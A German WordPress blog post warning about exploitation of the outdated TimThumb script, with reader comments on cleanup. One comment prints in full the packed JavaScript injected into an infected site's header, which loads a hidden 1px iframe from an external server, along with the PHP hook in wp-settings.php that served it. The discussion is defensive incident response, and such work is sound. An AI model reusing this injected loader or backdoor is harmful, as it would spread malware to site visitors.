Über die kritische Sicherheitslücke im TimThimb habe ich im August 2011 berichtet. Bei TimThumb handelt es sich um eine Anwendung, die Bilder verkleinern, zuschneiden und Vorschaubilder erstellen kann. Mit der Version 2.0 wurde die Sicherheitslücke geschlossen, es existieren aber noch sehr viele Weblogs, die die alte Version aktiv haben und die dadurch entstandene Sicherheitslücke wurde in den letzten tagen massiv ausgenutzt:
- Tausende WordPress-Blogs zur Verbreitung von Schadcode genutzt
- Thousands of WordPress blogs hijacked to deploy malicious code
Wer Hilfe bei der suche und der Entfernung der Sicherheitslücke braucht, der findet auf WordPress.org eine Erweiterung mit dem Namen Timthumb Vulnerability Scanner. Auf jeden Fall sollte man bei der Suche nicht nur nach timthumb.php sondern evtl. auch nach einer thumb.php suchen.
Wir arbeiten seit 20 Jahren mit WordPress und bieten diverse Dienstleistungen rund um das System an. Kontaktiere uns für weitere Informationen oder für ein Angebot.
Vollkommen richtig, der erneute Hinweis auf diese unschöne Sache!
Wichtig ist es auch, alle PLUGINS (also nicht nur Themes) zu untersuchen, denn auch da gibt es viele, die das Script verwendeten bzw. dies immer noch tun. – Längst noch nicht alle Entwickler/ Anbieter haben auf die neue Scriptversion 2.x aktualisiert!
Meines Erachtens ist der Einsatz des Scripts – welches zwar in V2.x sehr gut ist – nicht notwendig. Es ist halt nur sehr bequem für Entwickler dies zu nehmen, anstelle die WordPress-API für Bilder zu implementieren, die eigentlich sehr leistungsfähig ist.
Jeder Anwender/ Webmaster sollte seine Webseite checken und auch recherchieren, was verwendete Themes und Plugins betrifft!
Wichtig ist es auch andere Software wie z.B. Templates und Erweiterungen von Joomla! & Co. auf die TimThumb-Schwachstelle hin zu untersuchen. Bei Themes von RocketTheme bspw. ist die Schwachstelle bis heute enthalten und trotz Mahnung an die Entwickler immer noch nicht bei allen – vor allem älteren Themes – gefixt!
[…] über 3 Stunden nicht erreichbar. Nach Analyse der Logfiles fand ich viele Angriffe, die auf die Sicherheitslücke in der TimThumb hindeutete. Ein Angreifer versuchte bei mir die Funktion im Plugin UberMenu zu attackieren. Es ist […]
Kann es sein dass durch diesen folgender Code im Header ausgegeben wird:
eval(function(p,a,c,k,e,d) usw.
(ich will hier nicht den ganzen code posten)
Wegen diesem code bin ich überhaupt erst darafu gekommen, dass irgendwo vielleicht etwas nicht stimmt.
Leider findet man dazu nicht viel.
TimThumb ist upgedatet. Code weiterhin da
Update:
Habe auf dem server alles mit “thumb” entfernt. Templates gelöscht, plugins deaktiviert. Standart template von wordpress hoch.
Auf dem server war noch eine alte joomla installatione. Ebenfalls gelöscht.
Den ganzen server nochmal nach “thumb” untersucht, nichts gefunden (außer dem Plugin für das timthumb script scanner).
Der code ist auch weiterhin im header bereich.
LÖSUNG:
OK, ob es was mit dem TimThumb Script zu tun hat, weiß ich immer noch nicht.
Nachdem ich obige Schritte (kommentar nr. 3+4) gemacht habe, war der schadcode noch immer im header bereich (Google hat mich daruaf hingewiesen dass meine WordPress Seite Schadcode verbreitet).
eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('i 9(){a=6.h('b');7(!a){5 0=6.j('k');6.g.l(0);0.n='b';0.4.d='8';0.4.c='8';0.4.e='f';0.m='w://z.o.B/C.D?t=E'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|
MakeFrameEx|element|yahoo_api|height|width|display|none|body|
getElementById|function|createElement|iframe|appendChild|src|
id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http|
userAgent|1000|gfsgsaf|navigator|ai|showthread|php|72241732'.
split('|'),0,{}))
Wer sich mit dem auskennt kann die seite ja gerne mal besuchen, die da geladen wird 🙂
Um den Code zu entfernen muss im der wp-settings.php folgende funktion entfernt werden:
function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . ‘/wp_inc’)){
readfile($t_d . ‘/wp_inc’);
}
}
add_action(‘wp_head’, ‘check_wordpress’);
do_action( ‘init’ );
Diese gehört da definitiv nicht rein! befindet sich fast am Ende der wp-settings.php
Damit ist der Quellcode wieder sauber.
Das einzige was offen bleibt: Aus welchem “temp” Ordner holt er sich die Infos ?
Kennt jemand wp temp ordner? ich habe leider keine gefunden.
Vielleicht kann Perun hier noch was beisteuern.
[…] Blog von einem Schwarzen Loch. Das Problem ist wohl das WordPress Plugin TimThumb. Perun schreibt in seinem Blog, dass es sich bei der gefährlichen Version des Plugins um eine alte Version […]
[…] war wohl vermutlich ein Angriff auf eine veraltete timthumb-Komponente, eventuell ausgeliefert mit dem Plugin SliderVilla (Der Anbieter ist informiert und hat die Lücke […]
[…] die TimThumb Problematik berichtet, unter anderem auf perun.net gab es bereits vor einigen Tagen einen Artikel zu diesem Thema, aber ich wollte mich einfach mal wieder darin üben, eine ausführlichere, “bebilderte” […]
[…] Im November letzten Jahres kam das Thema noch einmal hoch. […]
Noch mehr Sicherheit auch bei aktuellen TimThumb Installationen: $ALLOWED_SITES = array ();